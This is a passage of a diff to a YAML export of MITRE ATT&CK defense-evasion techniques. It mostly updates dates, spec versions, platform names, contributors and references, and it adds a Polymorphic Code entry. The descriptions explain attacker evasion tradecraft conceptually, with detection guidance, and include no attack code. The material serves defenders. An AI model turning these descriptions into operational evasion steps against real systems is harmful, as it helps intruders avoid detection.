     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9583,11 +9668,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9735,7 +9820,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10128,7 +10277,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
